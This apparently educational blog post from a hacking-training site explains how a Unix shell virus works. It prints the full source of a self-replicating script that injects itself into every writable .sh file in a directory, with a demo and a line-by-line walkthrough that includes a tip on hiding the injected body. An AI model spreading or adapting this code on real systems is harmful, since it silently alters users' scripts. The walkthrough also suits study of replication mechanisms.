A Brief Introduction to UNIX SHELL Virus

Speaking of virus it has always been somewhat mysterious. I remember when I compiled my first dos virus in assembling it was such a painful task. From the initial assumption to the final accomplishment it took me more than 3 months, but what I had compiled was still at mess. Recently I come up with the idea that virus ultimately is something that affects other files and spreads itself, so it would not be too complicated to compile a virus by shell. Then I conveniently compiled the following script. Its functionality is to affect other shell programs.

This program is of little practical significance, but it is helpful to visually understand the virus spread mechanism. Therefore, its instructive significance is more important than the practical one.

Program Code

#!/bin/sh
#file name: virus_demo.sh
#purpose: shell virus demonstration
#note: the virus will affect all the files that end with .sh in the current
directory, but it will not affect them repeatedly.
#compiler: [email protected]
#date: 2003-5-13
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep ‘<+!a%C&t:>’ $f ; then continue; fi
if sed -n ‘1p’ $f | grep ‘csh’; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk ‘$0~/(^b*#)|(^b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp`
sed -n “1,${vNo}p” $vTmp >$f
(sed -n ‘/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p’ $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n “${vNo},$p” $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo “Hi, here is a demo shell virus in your script !”
#E:<+!a%C&t:>
#EOF
This program is of little practical significance, but it is helpful to visually understand the virus spread mechanism. Therefore, its instructive significance is more important than the practical one.

Demonstration

Test&#65306;
First put 2 files in the current directory. One is virus file, and another
is for affect test.

[[email protected] /export/home/cloud/vir]> ls -l
drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./
drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../
-rwxr–r– 1 cloud staff 89 6?? 4 17:43 test.sh
-rwxr–r– 1 cloud staff 773 6?? 4 17:42 virus_demo.sh
Let’s have a look at the victim script. It is very simple:
[[email protected] /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1
ls -l
#EOF
Begin to affect.
[[email protected] /export/home/cloud/vir]> ./virus_demo.sh
Hi, here is a demo shell virus in your script !
The result after affect&#65306;
[[email protected] /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep ‘<+!a%C&t:>’ $f ; then continue; fi
if sed -n ‘1p’ $f | grep ‘csh’; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk ‘$0~/(^b*#)|(^b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp`
sed -n “1,${vNo}p” $vTmp >$f
(sed -n ‘/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p’ $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n “${vNo},$p” $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo “Hi, here is a demo shell virus in your script !”
#E:<+!a%C&t:>
ls -l
#EOF
The virus body:
#B:<+!a%C&t:>
. . . .
#E:<+!a%C&t:>
is copied, thus the virus is spreaded.
Please note that the position where the virus body is injected is the beginning of the source test.sh’s effective program line. This results from the fact that most shell program experts prefer to make notes at the beginning of the program. You are not expected to put others’ note information to the end, or it would be too obvious.

Execute the new virus body&#65306;
[[email protected] /export/home/cloud/vir]> ./test.sh
Hi, here is a demo shell virus in your script !
Printing information in the virus body.
-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh
-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

Brief Explanation

Let’s analyze the virus step by step&#65306;
#B:<+!a%C&t:>
The virus body begins to tag, thus the program can locate itself during the
copying.
vFile=$_ ; vTmp=/tmp/.vTmp.$$
Defining 2 variables. One is temporary file, another records the current file-
name $_. Therefore it’s required this line should be the first line in the
effective line of the program, otherwise it’s impossible to acquire the name
of the current program, and subsequently it’s impossible to find the virus
body for copying.
for f in ./*.sh; do
Begin to circle, and find out all the programs that end with .sh in the
current directory.
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
If the target has write privilege and if the virus source file has read
privilege.
if grep ‘<+!a%C&t:>’ $f ; then continue; fi
If the target has been irreversibly affected. If so it would be immoral to
affect it again.
if sed -n ‘1p’ $f | grep ‘csh’; then continue; fi
If the target shell is in csh, they are too different in grammar. Give up.
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
Get ready to affect. First copy a backup for the target. What if the copying
fails? Of course have no choice but give up.
vNo=`awk ‘$0~/(^b*#)|(^b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp`
It seems to be complicated, but for shell virus learners they are expected
to know awk and the formal expression. This is the one used to find how many
comment lines and blank line in the program beginning, so as to determine
virus body’s inject position.
sed -n “1,${vNo}p” $vTmp >$f
A sed command copy the beginning comment section of the target file back
from the backup file.
(sed -n ‘/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p’ $vFile ;echo ) >>$f
One more sed to finish virus body transportation.
vNo=`expr $vNo + 1`
sed -n “${vNo},$p” $vTmp >>$f
The last sed moves other sections of the target file back. sed is powerful&#65281;&#65281;
rm -f $vTmp
Clean up temporary files.
done >/dev/null 2>&1
Circle is over.
unset vTmp ;unset vFile ;unset vNo
Clean up crime scene.
echo “Hi, here is a demo shell virus in your script !”
Since the file has been affected, show some indication to tell this is an
affected one.
#E:<+!a%C&t:>
The virus body stops tagging, so that the program copying locates itself.

Author: watercloud (watercloud_at_xfocus.org)



Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Top Suggestions To Minimize Cyber Attack Risks

The Cyber Protection and Cyber Attack definition play an important role in maintaining both global security and operational productivity due to the rapid proliferation...

Policing the Dark Web (TOR): How Authorities track People on Darknet

The darknet, especially the TOR network, can be hacked, or the information of the people using it can be extracted in the plain text....

Best VPNs for Android – and Why You Need One Now

Most people protect their laptops and computers from potential cyber-attacks but only consider the cybersecurity of their mobile devices when it’s too late. In recent...

The Levels of the Internet Surface Web, Deep Web, and Dark Web

The internet, invented by Vinton Cerf and Bob Cahn, has evolved since its creation in the 1960s. In 1990, the World Wide Web transformed...

LOOKING FOR HACKING RECIPES FORM THE PRO?

Then sign up for FREE to the ehacking’s exclusive group. You will get the exclusive tips/tricks, tutorials, webinars & courses that I ONLY share with my fellow on this exclusive newsletter.